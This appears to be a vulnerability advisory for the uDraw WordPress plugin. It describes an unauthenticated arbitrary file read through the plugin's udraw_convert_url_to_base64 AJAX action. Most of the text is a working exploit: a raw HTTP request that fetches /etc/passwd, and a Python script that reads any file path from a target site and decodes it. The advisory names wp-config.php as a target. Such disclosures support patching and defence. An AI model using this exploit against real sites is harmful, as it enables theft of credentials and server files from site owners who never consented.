The plugin does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc)
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Connection: close
action=udraw_convert_url_to_base64&url=/etc/passwd
#!/usr/bin/env python3
#
# Usage:
# python3 poc.py <wordpress root url> <absolute filepath to include>
#
# Example:
# python3 poc.py http://127.0.0.1:8080/ /etc/passwd
#
import sys
import base64
import requests
target_url = sys.argv[1]
filepath = sys.argv[2]
with requests.Session() as session:
response = session.get(target_url)
response = session.post(f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php", data={
"action": "udraw_convert_url_to_base64",
"url": filepath,
})
b64_file = response.text.split(",")[1].strip('"')
print(base64.b64decode(b64_file).decode())